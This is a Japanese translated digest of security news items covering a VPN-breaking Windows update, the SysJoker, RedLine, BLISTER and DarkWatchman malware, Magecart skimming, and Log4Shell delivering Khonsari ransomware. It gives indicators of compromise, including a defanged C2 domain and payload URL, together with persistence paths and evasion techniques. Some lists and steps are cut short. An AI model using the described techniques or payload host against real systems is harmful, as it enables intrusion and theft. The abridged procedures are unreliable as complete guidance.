 昨日のアップデートをインストールした後、Windowsユーザは、Windows VPNクライアントを使用して接続しようとした時、L2TP VPNが破壊されていることを発見した。
 VPNデバイスに接続しようとした時、彼らは、以下に示す"Can't connect to VPN. The L2TP connection attempt failed because the security layer encountered a processing error during initial negotiations with the remote computer(VPNに接続できません。リモートコンピュータとの最初の交渉中にセキュリティ層が処理エラーに遭遇したため、L2TP接続の試行に失敗しました(和訳はソフトアンテナより引用) )"というエラーメッセージを表示された。
 このイベントログは、エラーコード789(VPN接続に失敗した)と述べるエントリをログしている。
 このバグは全てのVPNデバイスに影響を与えるのではなく、接続を確立するために組み込みのWindows VPNクライアントを使用したユーザにのみ影響するようである。
 Twitter上で
Ronny として知られるセキュリティ研究者は、このバグはWindows VPNクライアント使用している人々のUbiquiti(【訳注】米国に本拠を置くテクノロジ企業)のClient-to-Site VPN接続に影響を与えているとBleepingComputerに話した。
 多くのWindows管理者もまたRedditに、このバグはSonicWall, Cisco Meraki, WatchGuard Firewallへの接続に影響を与えており、後者のクライアントもこのバグの影響を受けていると
報告 している。
 多くのユーザは未だリモートで作業しているので、管理者はKB5009566とKB5009543アップデートを削除せざるをえない。これで再起動すると直ちにL2TP VPN接続は修復される。
 Windowsユーザは、管理者に特権を昇格させたコマンドプロンプトで以下のコマンドを使用することでKB5009566とKB5009543を削除することができる。
Windows 10: wusa /uninstall /kb:5009543 
 しかしながら、Microsoftは単一のWindows累積アップデートに全てのセキュリティアップデートを同梱しているので、このアップデートを削除すると、1月の定例アップデートでパッチした脆弱性に関する全ての修正が削除される。
 それ故、Windows管理者は、パッチが適用されていない脆弱性のリスクと、VPN接続に接続できないことによって引き起こされる混乱のリスクを比較検討する必要がある。
 どれがこのバグを引き起こしているのかは明らかではないが、Microsoftの1月の定例パッチはWindows Internet Key Exchange (IKE)プロトコル中の多くの脆弱性(
CVE-2022-21843 , 
CVE-2022-21890 , 
CVE-2022-21883 , 
CVE-2022-21889 , 
CVE-2022-21848 , 
CVE-2022-21849 )を修正している。また、この問題を発生させる可能性があるWindows Remote Access Connection Manager中の脆弱性(
CVE-2022-21914 、
CVE-2022-21885 ) を修正している。
 残念ながら、現時点でL2TP VPN接続の修正もしくは解決策は分かっていない。
 BleepingComputerは、このバグに関してMicrosoftに尋ねたが、未だに返答はない。
新しいSysJokerバックドアはWindows, macOS, Linuxをターゲットにしている 
 BleepingComputer : News>Security(2022/01/11) 
 'SysJoker'と名付けられた新しいマルチプラットフォーム バックドアが、オンライン上に出現した。このバックドアはWindows, Linux, macOSをターゲットにしており、三つのオペレーティングシステム全てで検出を回避する能力を持っている。
 この新しいマルウェアの発見は、LinuxベースのWebサーバへの攻撃を調査していた2021年12月、この行動の兆候を最初に発見したIntezerの研究者からである。
 VirusTotalへのこのマルウェアサンプルの最初のアップロードは、2021年下半期に発生している。これはまた、C2ドメイン登録時間と一致している
 このセキュリティ アナリストは、SysJokerに関する詳細な技術情報を公開している。研究者達は、公開前にBleepingComputerとこの情報を共有していた。
Jokerは注目を集めるのが嫌い 
 このマルウェアはC++で書かれており、各変種はターゲットのオペレーティングシステム用に適合されているが、それら全てがVirusTotal(57の異なるアンチウィルス検出エンジンを使用するオンライン スキャンサイト)で未検出である。
 Windowsで、SysJokerは第一段階でDLLの形式でドロッパーを使用する。これは、以下に示すことを実行するためにPowerShellコマンドを使用する。
・ GitHubレポジトリからSysJoker ZIPを掴む 
 次に、このマルウェアは最大2分間ほど活動しない。その後、新しいディレクトリを作成し、Intel Graphics Common User Interface Service ("igfxCUIService.exe”)としてそれ自身をコピーする。
 「次に、SysJokerはLiving off the Land (LOtL、【訳注】自給自足/環境寄生と訳され、マルウェアが既存のリソースを利用して溶け込み、AV やサンドボックスの解析による検出を回避するための手法(Deep Instinctより))コマンドを使用してマシンに関する情報を収集する。SysJokerは、このコマンドの結果をログするために様々な一時テキストファイルを使用している」と、「これらのテキストファイルは即座に削除され、JSONオブジェクトに格納される。次にエンコードされ、"microsoft_Windows.dll”と名付けられたファイルに書き込まれる」と
Intezerのレポート は説明している。
 システムとネットワークデータを収集した後、このマルウェアは、新しいレジストリキー(HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)を追加することで永続性を作成する。全ての機能がこの段階に到達する間は、ランダムな活動しない時間が挿入される。
 このマルウェアの次のステップは、そのアクターが制御しているC2サーバと心を通わせることである。これはハードコードされたGoogle Driveリンクを使用している。
 このリンクは、アクターが利用可能なサーバをライブビーコンに提供するために恒常的にアップデートしている"domain.txt”ファイルをホストしている。このリストは検出とブロックを回避するために、しょっちゅう変更されている。
 感染の初期段階で収集されたシステム情報は、最初のハンドシェイク(【訳注】通信する前に制御情報を交換すること)としてC2に送信される。このC2は感染した末端の同定子として一意のトークンで応答する。
 そこから、このC2は、追加のマルウェアをインストールしたり、感染したデバイス上でコマンドを実行したり、あるいは、バックドアがそれ自体をこのデバイスから削除するようにこのバックドアに命令する。けれども、この最後の二つの指示は未だ実装されていない。
 LinuxとmacOS用の変種は初期段階でDLL形式のドロッパーを持っていないが、最終的には感染したデバイス上で同じ悪意ある挙動を実行する。
検出と防御 
 Intezerは、彼らのレポート中にあらゆるIndicators Of Compromise(IOCs、【訳注】侵害の痕跡 (IOC) により、差し迫った攻撃、ネットワーク侵害、マルウェア感染を把握できる(Intsightsより))を提供しているので、管理者は感染したデバイスにSysJokerの存在を検出するために使用することができる。
 以下に、各オペレーティングシステムに関するIOCの一部を概要する。
 Windows 、このマルウェアのファイルは"C:\ProgramData\RecoverySystem"フォルダの下、C:\ProgramData\SystemData\igfxCUIService.exe,とC:\ProgramData\SystemData\microsoft_Windows.dllに配置される。
 Linux 、このファイルとディレクトリは"/.Library/”の下に作成され、永続性は以下のcronジョブ: @reboot (/.Library/SystemServices/updateSystem)を作成することで確立される。
 macOS 、このファイルは"/Library/”に作成され、永続性は、パス: /Library/LaunchAgents/com.apple.update.plistの下のLaunchAgentを介して達成される。
 Intezerレポートで公開されたC2ドメインは以下である:
・ https[://]bookitlab[.]tech 
 SysJokerにセキュリティ侵害されたことを発見した場合には、以下の三つのステップに従いなさい:
1 このマルウェアに関連する全てのプロセスをKILLしなさい。そして、手動でファイルと関連する永続性メカニズムを削除しなさい 
Microsoft: KB5008212 Windowsセキュリティ アップデートはOutlookの検索を破壊する 
 BleepingComputer : News>Security(2022/01/06) 
 Microsoftは、12月の定例パッチでリリースされたWindows 10 バージョン21H2セキュリティアップデートによって発生する問題(Microsoft 365用のOutlookに検索トラブルを導く)を認識していた。
 「
KB5008212 アップデートをインストールすると、その後のeMailは検索結果に表示されない可能性がある」と、Microsoftは最近公開したOfficeサポートドキュメントで説明している。
 Microsoftは、現在調査中であり可能な限り早急に詳細な情報とアップデートを提供すると発言している。
 この新たに知られた問題は、
Windows 11にアップグレードしたシステム上で発生する 別の問題と大変類似しており、同様に検索トラブルを引き起こしている。
 この新しいバグと同じではないが、これらの問題は、Windows 11 プレビュービルドをユーザがインストールし始めた2020年6月に表面化し始めた。この時は、アップグレードプロセス中にWindows検索インデックスを削除していた。
 顧客は現時点で、Windows Desktop Searchを無効にしOutlookの検索エンジンに切り替えるようにレジストリキーを設定することで、Outlookの検索が結果を返してこない問題は修正できるとアドバイスされている。
 組み込みの検索が開始されると、Outlookは、"search performance will be impacted because a group policy has turned off the Windows Search service."を表示し、パフォーマンスに影響がでると警告してくる。
Outlookの検索が機能しない問題に関する一時的な解決策 
 MicrosoftはWindows 10 
KB5008212 セキュリティアップデートによって発生した検索トラブルの修正が利用可能になるまでの解決策として同じアプローチを推奨している。
 Outlook用のWindows Desktop Searchを無効にするには以下の手順に従う必要がある:
1.ログイン後、Startボタンを右クリックし、Runを選択する。開いたダイアログボックスでregeditとタイプしOKをクリックする。これでレジストリエディタが起動する。HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows 
3.Edit > New > Key をクリックし、この新しいキーをWindows Searchと名付ける。 
 Windows Desktop Searchを復活させたい場合は、0をタイプし、OKをクリックすることでPreventIndexingOutlookを無効化する必要がある。
 Microsoftはまた、以下の問題を含む他の既知のOutlook問題に関する解決策を公開している:
米国の警察はフィッシング用QRコードの付いたパーキングメータを警告している 
 Bitdefender : Industry News(2022/01/05) 
 急いで車を駐車したい? パーキングメータ用の現金を探すためにポケットを探し回りたくない? あるいは、電話に正しい支払いアプリケーションをインストールしていない?
 ところで、メータの側面に貼り付けてある支払いQRコードを慌ててスキャンする前に注意深く考えよう。それは、あなたの金融情報を釣り上げるために詐欺師によって企てられたものかもしれないと。
 警察は、パーキングメータにQRコードが貼り付けられておらず、コイン、カード、スマートフォンアプリでのみ支払うことができるテキサス州オースティンで、公共のパーキングメータに貼り付けられたインチキのQRコードを発見したと
警告 している。
 この都市の訪問者や疑うことを知らない急いでいる人々が、考えもなしにこのインチキのQRコードを単純にスキャンしたら何が起こるのだろうか?
 オースティン警察が発見したこのQRコードは、疑うことを知らないユーザを詐欺のためのWebサイトに連れて行く、そして、希望の駐車時間の料金が支払われるという偽の契約で支払い情報の詳細を訪ねてくる。
 オースティン市役所は、サン アントニオの職員によって類似のQRコードスカムを通知された後、そのパーキングメータをチェックした。彼らは、12月下旬同様に貼られた100を超えるパーキングメータを発見した。
 サン アントニオ警察のMarcus Booth警部補は、このWebページは希望する駐車時間用の支払いを受け入れるように装っており、金銭は市の財源になるのではなくスカマーの手に落ちるとレポータに告げている。
 簡単に言えば、窃取の犠牲者は車の運転手だけでなく、市もまた犠牲者である。
 二つの市でパーキングメータに貼り付けた攻撃が関連しているのか、模倣なのかは不明である。しかし、明らかに、他のグループが他のアメリカの都市や世界の他の場所で実際に複製することが難しいスカムではない。
 結果として、パーキングメーターの代金は現金もしくは適切なスマートフォンアプリを介して支払う方が賢明であるかもしれない。
 当局は、詐欺用のパーキングメーターのQRコードにだまされた可能性があると思われる人は誰でも、
警察に報告 し、直ぐに支払いカードの発行者に通知するように勧めている。
 他方、バッジを付けた市職員以外の者がパーキングメーターを弄っているのを発見したなら、やるべきことをして、警察に電話しなさい。
RedLineマルウェアはパスワードをブラウザ中に保存してはならないことを示している 
 BleepingComputer : News>Security(2021/12/28) 
 RedLine情報窃取マルウェアは、Chrome, Edge, Operaのような人気のWebブラウザをターゲットにしており、ブラウザ中にパスワードを格納することが悪い考えであることを証明している。
 しかしながら、
AhnLab ASEC からの新しいレポートは、Webブラウザの自動ログイン機能を使用する便利さが、組織と個人の両方に影響を与える重大なセキュリティ問題になりつつあると警告している。
 アナリストが提示した例では、リモートの従業員は、VPNアカウント認証情報を失い、これを窃取したRedLine Stealerのアクターが、この情報を使用して三ヶ月後にこの企業のネットワークをハッキングしていた。
 感染したコンピュータにアンチマルウェア ソリューションがインストールされている場合でも、RedLine Stealerの検出と削除に失敗している。
 このマルウェアは、ChromiumベースのWebブラウザ中に見出される「ログインデータ」をターゲットにしている。そして、このデータはユーザ名とパスワードを保存しているSQLiteデータベースである。
 Chromiumベースのブラウザに使用されているようなブラウザ パスワードストアは暗号化されているが、情報窃取マルウェアは、同一のユーザとしてログインしている限りプログラムを使用してストアを復号することができる。RedLineは感染したユーザとして実行されているので、感染したユーザのブラウザ プロファイルからパスワードを抽出することができる。
 「Google ChromeはWindows組み込みのCryptProtectData関数でパスワードを暗号化する。現在、この関数はtriple-DESアルゴリズム(【訳注】共通鍵ブロック暗号であるDESを3回施す暗号アルゴリズム(Wikipediaより))を使用し、データを暗号化するためにユーザ特定のキーを作成する非常に安全な関数であるが、パスワードを暗号化したユーザと同じアカウントでログインした場合にはパスワードを復号することができる」と、「このCryptProtectData関数は、その逆を実行するCryptUnprotectDataとの双子である。想像しているように、この関数はデータを復号する。これは明らかに、格納されているパスワードを復号するために大変有用である」と、'
chrome_password_grabber 'プロジェクトの著者は説明している。
 ユーザがブラウザ中にこの認証情報の格納を拒否した場合でさえ、このパスワード管理システムは、特定のWebサイトが「ブラックリストに登録されている」ことを示唆するために依然としてエントリを追加する。
 この脅威のアクターは、この「ブラックリストに登録されている」アカウント用のパスワードを持っていない可能性があるが、それは、そのアカウントが存在していることを彼らに告げているので、認証情報要素や、ソーシャルエンジニアリングやフィッシング攻撃を実行することを可能にしている。
 盗んだ認証情報を収集した後、脅威のアクターはそれらを将来の攻撃に使用するか、あるいはダークWeb市場でそれらを販売することによって現金化しようとする。
 RedLineがハッカーに広汎に普及している例は、
'2easy'ダークWeb市場 の台頭である。此処で販売されていたデータの半分がこのマルウェアを使用して盗まれたものである。
 RedLine拡散の最近の他のケースは、パスワード窃取マルウェアをダウンロードしインストールさせるExcel XLLファイルを使用するWebサイト 
コンタクト スパムキャンペーン である。
 RedLineは今、何処にでもいるかのようである。この主たる理由は、最先端のWebブラウザが解決することを拒否している広汎に利用可能なセキュリティギャップのセキュリティ侵害に効果的なことにある。
代わりに実行すること 
 ログイン認証情報を格納するためにWebブラウザを使用することは、魅力的であり便利であるが、これを十個刷ることはマルウェア感染していなくても危険である。
 これを実行することによって、あなたのマシンにアクセスを持っているローカルもしくはリモートアクターは数分のうちにあなたの全てのパスワードを盗むことができる。
 代わりに、専用のパスワードマネージャを使用することが最善である。専用のパスワードマネージャは暗号化された金庫室にすべてのものを格納し、金庫室を解錠するにはマスターパスワードが要求される。
 更に、e-バンキング ポータルや企業資産のWebページのような重要なWebサイト用に特別なルールを設定する必要があり、手動で認証情報をインプットすることが要求される。
 最後に、これが利用可能な場合は常に多要素認証をアクティブにしなさい。この追加のステップで認証情報がセキュリティ侵害された場合でもアカウント乗っ取り事案からあなたは保護される。
ステルス性BLISTERマルウェアはWindowsシステムに気づかれずに潜り込む 
 BleepingComputer : News>Security(2021/12/23) 
 セキュリティ研究者は、悪意あるコードを正当な実行ファイルのように装うために有効なコードサイニング証明書(【訳注】コンピュータプログラムを配布・販売する際に、利用者が発行元の確認や改竄検知ができるように付与されるデジタル署名の証明書(e-Wordsより))に依存する悪意あるキャンペーンを発見した。
 この研究者達がBlisterと呼んだペイロードの一つは、他のマルウェア用のローダーとして挙動し、低い検出率を楽しむ新しい脅威のようである。
 Blisterの背後にいる脅威のアクターは、彼らの攻撃を探知されないようにする複数のテクニックに依存しており、コードサイニング証明書は彼らのトリックの一つに過ぎない。
署名、シール化、拡散 
 Blisterマルウェアの背後にいる者は、検索会社Elasticの研究者達が発見した、遅くとも9月15日以降少なくとも三ヶ月間キャンペーンを実行してきている。
 この脅威のアクターは8月23日から正当なコードサイニング証明書を使用している。この証明書はロシアのプロバイダーMail.RuのeMailアドレス付きでBlist LLCと呼ばれる企業のためにデジタルアイデンティティ プロバイダSectigoによって発行されていた。
 正当な証明書をマルウェアにサインして使用することは、脅威のアクターが数年前に学習した古いトリックである。その時点に戻る。彼らは正当な企業から証明書を盗んで使用していた。今日、脅威のアクターは彼らがセキュリティ侵害した企業もしくは、隠れ蓑の企業の詳細を使用して正当な証明書を要求している。
 今週のブログへの投稿に於いて、Elasticは、証明書の悪用をSectigoに対して責任を持って通知したので、この証明書は取り消される可能性があると
発言している 。
 この研究者達は、この脅威のアクターが複数のテクニックに依存して攻撃を検出されないようにしていると発言している。その一つの方法が、Blisterマルウェアを正当なライブラリ(例えば、colorui.dll)に埋め込むことであった。
 このマルウェアは、次にrundll32コマンドを介して特権の昇格を実行する。正当な証明書付きでサインされ管理者特権で配備されると、Blisterはセキュリティソリューションをすり抜ける。
 次のステップで、Blisterは、リソースセクションから「高度に難読化」されたブートストラッピング コードを平文化すると、Elasticの研究者達は発言している。10分間、このコードは、おそらくSandobox解析を回避するために睡眠状態のままになっている。
 次に、行動を起こし、リモートアクセスを提供するために埋め込まれているペイロードを復号し、水平方向への移動(過去、複数の脅威のアクターによって使用されたCobalt StrikeやBitRAT同様に)を可能にする。
 このマルウェアは、rundll32.exeのように装いProgramDataフォルダや他のフォルダにコピーすることで永続性を達成している。これは、スタートアップの場所に追加されるのでブートの度にexplorer.exeのチャイルドとして起動される。
 Elasticの研究者達は、Blisterローダの署名されたバージョンと未署名のバージョンを発見している。そして、共にVirusTotalスキャンニングサービスのアンチウィルスエンジンで低い検出率を誇っている。
 初期感染ベクトルのこれらの攻撃の目的は不明なままであるが、正当なコードサイニング証明書、正当なライブラリへのマルウェアの埋め込み、メモリ中でのペイロードの実行を組み合わせることによって、この脅威のアクターは攻撃の成功率を高めている。
 Elasticは、
Blisterの挙動を同定するためにYara (【訳注】マルウェアの研究者たちのために作られた、マルウェアを検知・解析・分類するための、オープンソースのプログラム(SIOS SECURITY BLOGより))ルールを作成し、組織がこの脅威を防衛するための支援となる改竄の兆候を提供している。
新しいステルス性DarkWatchmanマルウェアはWindows Registryに隠れいている 
 BleepingComputer : News>Security(2021/12/19) 
 'DarkWatchman'と名付けられた新しいマルウェアが、サイバー犯罪地下組織に出現した。このマルウェアは、C#キーロガーと組み合わされており軽量で高い能力を持つJavaScript RAT (Remote Access Trojan)である。
 Prevailionの研究者による技術レポートによると、この著名なRATは、主にロシアの組織をターゲットにしているロシア語で意思の疎通ができる攻撃者によって使用されている。
 DarkWatchmanの存在の最初の兆候は、脅威のアクターが悪意あるZIP添付ファイル付きのフィッシングeMailを介して、このマルウェアを拡散し始めた11月初めであった。
 これらの添付されているZIPファイルには、アイコンを使用してテキストドキュメントに偽装した実行ファイルが含まれている。これらの実行ファイルは、RATとキーロガーをインストールする自己インストール型WinRARアーカイブである。
 このZIPファイルを開くと、ユーザは"Unknown Format"と記された囮のポップアップメッセージを表示される。しかし、実際にはペイロードがバックグラウンドでインストールされている。
ステルス性「ファイルレス」RAT 
 DarkWatchmanは大変軽量のマルウェアである、このJavaScript RATは32Kbのサイズであり、使用スペースは8.5Kbに過ぎないようにコンパイルされている。
 これは、"living off the land"(【訳注】マルウェアが既存のリソース(Microsoft Windowsに組み込まれた機能や信頼できるツール)を利用して溶け込み、AV やサンドボックスの解析による検出を回避するためのもの(DeepInstinctより))バイナリ、スクリプト、ライブラリの大きなセットを悪用し、モジュール間でのデータ転送のためにステルス性の手法を組み込んでいる。
 DarkWatchmanの魅力的な側面は、キーロガー用にWindows Registryファイル-レス(【訳注】ユーザに何らかの方法でソフトウェアをインストールさせて攻撃行動を実行するが、ディスクには痕跡を残さず、メモリ内だけに常駐して、攻撃を実行する手法(NECソリューションイノベータより))ストレージ メカニズムを使用していることである。
 ディスク上にキーロガーを格納する代わりに、ユーザがWindowsにログインする度にDarkWatchman RATを稼働するスケジュール タスクが作成されている。
 一旦起動すると、DarkWatchmanは、.NET CSC.exeコマンドを使用してキーロガーをコンパイルするPowerShellスクリプトを実行し、このキーロガーをメモリ中にロードする。
 「このキーロガーは、難読化されたC#ソースコードとして拡散し、Base64でエンコードされたPowerShellコマンドとして処理されレジストリに格納される。このRATが起動すると、このPowerShellスクリプトを実行し、次に、キーロガーをコンパイルし実行する」続いて「このキーロガー自体はC2(コマンドアンドコントロール サーバ)と相互通信はしないし、ディスク上への書き込みもしない。代わりに、このキーロガーがバッファとして使用しているレジストリキーにキーログを書き込む。この操作の間、このRATはログしたキーストロークをC2サーバに送信する前に、このバッファをスクレイピング(【訳注】必要なデータをWeb等から取得する行為)しクリアする」と、Prevailionの研究者Matt StaffordとSherman Smithは彼らの
レポート の中で説明している。 
 このように、レジストリはエンコードされた実行コードを隠すための場所としてだけではなく、C2に抽出した機密情報をコッソリ渡すまで、盗んだデータを保持するための一時領域でもある。
 C2コミュニケーションとインフラストラクチャに関して、DarkWatchmanのアクターは、10項目のシードリストと共にDGA(ドメイン生成アルゴリズム)を使用して、毎日最大500個のドメインを生成している。
 これにより、優れた作戦回復力が得られると同時に、通信のモニタリングと分析が非常に困難になる。
 DarkWatchmanの機能は以下である。
 ・ EXEファイルを実行します(出力が戻されるか否かに関係なく) 
この身代金要求型マルウェアの仮説 
 Prevailionは、DarkWatchmanが、強力でステルスなツールで能力の低いアフィリエイトに権限を与える必要がある身代金要求型マルウェア グループによって(もしくは、身代金要求型マルウェア グループのために)テーラーメイドされた可能性があると理論付けしている。
 このマルウェアは、追加のペイロードをリモートでロードできるので、後続の身代金要求型マルウェアの配備のためのステルス性第1段階感染として使用される可能性がある。
 DarkWatchmanは、最初の足掛かりを作った後、このアクターが制御するドメインとコミュニケーションできるため、この身代金要求型マルウェアのオペレータは、ランサムウェアを接収したり配備したり、あるいは、ファイルの抽出を直接処理したりできる。
 このアプローチは、アフィリエイトの役割をネットワーク侵入者の役割にまで低下させ、同時にRaaSのオペレーションをより臨床的かつ効率的にしている。
クレジットカード スティーラでハックされたサイトは数カ月間未検出だった 
 BleepingComputer : News>Security(2021/12/15) 
 脅威のアクターは顧客から盗んだ支払い情報が数カ月間未検出だったことから、この休日期間にクレジットカード スキミング攻撃を準備しているだろう。
 Megacartスキミングは、ターゲットのWebサイトに悪意あるJavaScriptコードを挿入することに関連する攻撃である。このJavaScriptは、訪問者がチェックアウトのページに存在している時に実行される。
 このコードは、クレジットカード番号、所有者名、住所、CVV(セキュリティコード)のような支払い情報の詳細を窃取する。そして、それらの情報をこのアクターに送信する。
 脅威のアクターは次に、この情報をオンラインでのグッズの購入に使用したり、地下フォーラムや
"carding"サイト として知られる暗黒Web市場で他のアクターに販売するために使用する。
SCUFコネクション 
 2021年10月、カスタムPCとコンソールコントローラのリーディング企業である
SCUF Gaming International はMegacartで攻撃され、結果として32,000人の財務情報の詳細がセキュリティ侵害されていたことがAkamaiの研究者によって発見された。
 詳細な調査によって、このアナリスト達は、複数のサイトからクレジットカードの詳細を盗んだスキマーの広範なネットワークを運用している者が、SCUFに対する攻撃の責任者と同じ人物であることを発見した。
 被害を受けたサイトは以下である。
・ whitemountainshoes.com - 靴、履物類 (Alexa rank: 425k) 
 Alexa rank番号 が小さいほど、Webサイトが受け取るトラフィックが多いので、スキマーが未検出のまま存在する時間が長くなる、そこでMegacartのアクターが盗むクレジットカードの詳細が多くなる。
 このように、アクターは、
スキマーが感染したサイト上で隠れる ためにスクリプトの行動を価値のあるページに制限しているため、Akamaiの調査を困難にしている。
 「スキマーのコマンドアンドコントロール(C2)サーバーは、機密性の低いページで実行するとクリーンなコードで応答していることを発見した...」と、「...そして(スキマーは)クレジットカード情報が見つけられることのできるチェックアウトのページで実行された場合にのみ、悪意のあるコードを送信する」と
Akamaiのレポート は説明している。
 Magecartのアクターが実行しているもう一つの検出防止手段は、ターゲットにしているWebサイト毎に新しいスキミング ドメインを登録していることである。
 スキミング操作が露見/発見された場合、そのドメインを非アクティブ化し他のサイトで悪意のある行動を続行している。
 この特定のケースでは、アクターは4つのWebサイトに同じC2ドメインを使用したため、小さなクラスターがほぼ同時に明らかになった。
クリスマスの期間は警戒するようにアドバイスされている 
 オンラインショッピングに耽っている消費者は、Magecartのアクターが積極的に活動するであろうクリスマスの間、特に注意するようアドバイスされている。
 スキマーの検出は、Eコマースサイト所有者の責任であり、訪問者の責任ではない。訪問者は代わりに次のことを行うことができる。
 最新(【訳者補注】もしくは、アップデートして)のインターネット セキュリティ ソリューションを使用する 
 今年、上記7つのWebサイトからクレジットカードを使用して何かを購入した場合は、支払いの詳細が危険にさらされていると考え、銀行に電話し、カードの交換を依頼しなさい。
現在、新しい身代金要求型マルウェアがLog4Shell攻撃で配備されている 
 BleepingComputer : News>Security(2021/12/14) 
 身代金要求型マルウェアをダウンロードしインストールするために使用されているLog4j Log4Shell脆弱性の最初に公開されたケースは研究者たちによって発見された。
 先週の金曜日、公開された脆弱性攻撃は、Apache Log4j Javaベース ログイン プラットフォームで
'Log4Shell'と名付けられた緊急の0-Day脆弱性 に関するものであった。Log4jは、開発者のJavaアプリケーションにエラーやイベントログを追加することを可能にする開発フレームワークである。
 この脆弱性は、Log4jによって読み込まれた時、このプラットフォームが含まれているURLに接続しコードを実行するための特別なJNDI(【訳注】Java Naming and Directory Interfaceの頭文字)文字列を脅威のアクターが作成することを可能にしている。これは攻撃者が、簡単に脆弱性のあるデバイス検出したり、リモートサイトやBase64でエンコードされた文字列を介して供給されるコードを実行することを可能にするものである。
 この脆弱性は、
Log4j 2.15.0 で修正されLog4j 2.16.0で更に強化されたが、
様々なマルウェア(coin miners, botnets, Cobalt Strike beaconsを含む)インストールする ために脅威のアクターによって広範な脆弱性攻撃に使用されている。
身代金要求型マルウェアをインストールする最初のLog4j脆弱性攻撃 
 昨日、Bitdefenderは、Log4Shell脆弱性攻撃を介して直接身代金要求型マルウェアファミリーをインストールする最初のケースを発見したと
レポート した。
 この脆弱性攻撃は、Log4jアプリケーションによってロードされ実行される
hxxp://3.145.115[.]94/Main.class からJavaクラスをダウンロードする。
 一旦ロードされると、'Khonsari'と名付けられた新しい身代金要求型マルウェア[
VirusTotal ]をインストールするために同じサーバから .NETバイナリをダウンロードする。
 この同じ名前はまた、以下に示すように暗号化されたファイルの拡張子や脅迫文としても使用されている。
 その後の攻撃に於いて、BitDefenderは、この脅威のアクターがOrcus Remote Access Trojanを拡散させるために同じサーバを使用していたことに気づいた。
ワイパーの可能性が高い 
 身代金要求型マルウェアのエキスパートMichael GillespieがBleepingComputerに告げたところによると、Khonsariは確固たる暗号化を使用しており、安全である。これはファイルを無料で復号することが不可能であることを意味している。
 しかしながら、この脅迫文には一つ奇妙な点がある。身代金を支払うために脅威のアクターに接触する情報が含まれていないようである。
 Emsisoftのアナリスト
Brett Callow がBleepingComputerに指摘したところによると、この身代金要求型マルウェアは、脅威のアクターではなくLouisianaアンティークショップのオーナーへの接触情報に因んで名付けられているとしている。
 それ故、この人が、この身代金要求型マルウェア攻撃の実際の犠牲者なのか、囮としてリストされているのかは不明である。
 理由の如何を問わず、これは脅威のアクターへの正当な接触情報を含んでいないので、我々は、これは身代金要求型マルウェアではなくワイパーであると確信している。
 これは、身代金要求型マルウェア(ワイパー?)を直接インストールするLog4j脆弱性攻撃の最初に知られたインスタンスである可能性がある。Microsoftは既に、この脆弱性攻撃がCobalt Strike beaconを配備するために使用されていることを確認している。
 従って、より高度な身代金要求型マルウェア オペレーションが彼らの攻撃の一部としてこの脆弱性攻撃に既に使用されている可能性がある。
STOP身代金要求型マルウェアのワクチンが暗号化をブロックするためにリリースされた 
 BleepingComputer : News>Security(2021/12/07) 
 ドイツのセキュリティソフトウェア企業G DATAは、STOP身代金要求型マルウェアが感染後犠牲者のファイルを暗号化することをブロックするワクチンをリリースした。
 「このツールは感染自体を防ぐものではない。STOP身代金要求型マルウェアは、依然として脅迫文を配置し、システムの設定を変更するかもしれない」と、続けて「しかし、STOP身代金要求型マルウェアは、そのシステムがこのワクチンを持っていたなら、最早ファイルを暗号化することはない。この脅迫文は、個人IDの代わって、ファイルはワクチンによって保護されたとする文字列を含んでいる」と、G DATAのマルウェア解析者Karsten HahnとJohn Parolは
説明 している。
 あなたは、
ここからSTOP身代金要求型マルウェアのワクチンをダウンロード (コンパイルされた .EXE もしくは Pythonスクリプトとして)することができる。
 このワクチンは、あなたのセキュリティソフトにシステムが感染されたと思わせる可能性がある。これは、そのデバイスが既にセキュリティ侵害されていると、STOP身代金要求型マルウェアを欺くために、通常感染させられたシステムにこのマルウェアが配備するファイルを追加することによって動作する。
 148の変種によって暗号化されていたファイルを無料で復号するためにEmsisoftとMichael Gillespieによって2019年10月に
Stop身代金要求型マルウェア用の復号プログラムもリリース されたが、新しい変種に対しては最早機能しない。他方、この身代金要求型マルウェア株に対する防御をのぞむのであれば、G DATAのワクチンは確実な方法である。
 
 しかしながら、脅威のアクターはワクチンがリリースされた後、一般的にはワクチンをバイパスするため、このワクチンは、この身代金要求型マルウェアの将来のバージョンでは機能しなくなる可能性がある。
 したがって、ワクチンを適用した後は、重要なファイルがバックアップされていることを確認する必要がある! 
STOP Ransomware ― 誰も語っていない最もアクティブなランサムウェア  
 他の身代金要求型マルウェア株がメディアの注目を浴びているが、STOP身代金要求型マルウェアは、近年ID Ransomeware(【訳注】身代金要求文、及び/又は、暗号化されたファイルのサンプルをアップロードすることでランサムウェアを特定するためのサイト、このサイトは言語を選択することで日本語化できます)への登録と
BleepingComputerのフォーラム でのサポートリクエストの最も重要な一部である。
 積極的に活動している身代金要求型マルウェアの中で、一日あたりの
ID Ransomeware への数千の送信のうちの60~70%がSTOP身代金要求型マルウェアに関するものである。
 
 これは、この身代金要求型マルウェアが、怪しげなサイト、悪意あるソフトウェアクラックもしくは、アドウェアに同梱されたフリープログラムを装うものを押し付けることを通じて、主にホーム ユーザをターゲットにしているためである。
 後者は通常、ユーザーのコンピューターに様々な望みもしないソフトウェアをインストールする。多くの場合、インストールされるプログラムの1つは、STO身代金要求型マルウェア等のマルウェアである。
 STOP身代金要求型マルウェアの拡散に使用されているものとして報告されているクラックは、KMSPico, Cubase, Photoshop, アンチウィルスソフトが含まれている。
 
 この展開手法を使用することの他に、STOPは、一般的な身代金要求型マルウェア同様にファイルを暗号化し、拡張子を追加し、500USDから1000USDの範囲で身代金を要求する文書をドロップする。
 そこで、これを成功させるために、大量の変種を絶えずリリースし検出を回避している。 
悪意あるExcel XLLアドインが、パスワード窃盗マルウェアRedLineを押し付けている 
 BleepingComputer : News>Security(2021/12/05) 
 サイバー犯罪者は、Webサイトのコンタクト フォームやディスカッション フォーラムをスパミングし、パスワードと情報を盗むマルウェアであるRedLineをダウンロードさせインストールさせるためにExcell XLLファイルを配布している。
 RedLineは、クッキー、ユーザ名とパスワード、Webブラウザ中に保存されているクレジットカード並びに感染したデバイスからFTP認証とファイルを盗む情報窃盗トロイの木馬である。
 データの窃取に加えて、RedLineは、コマンドを実行し更なるマルウェアをダウンロードし稼働し、アクティブWindowsスクリーンのスクリーンショットを作成することができる。
 この全てのデータは集められ、犯罪者マーケットで販売するためにこの攻撃者に送り返されたり、他の悪意ある行為や詐欺行為に使用される。
コンタクト フォームやディスカッション フォーラムをスパミングする 
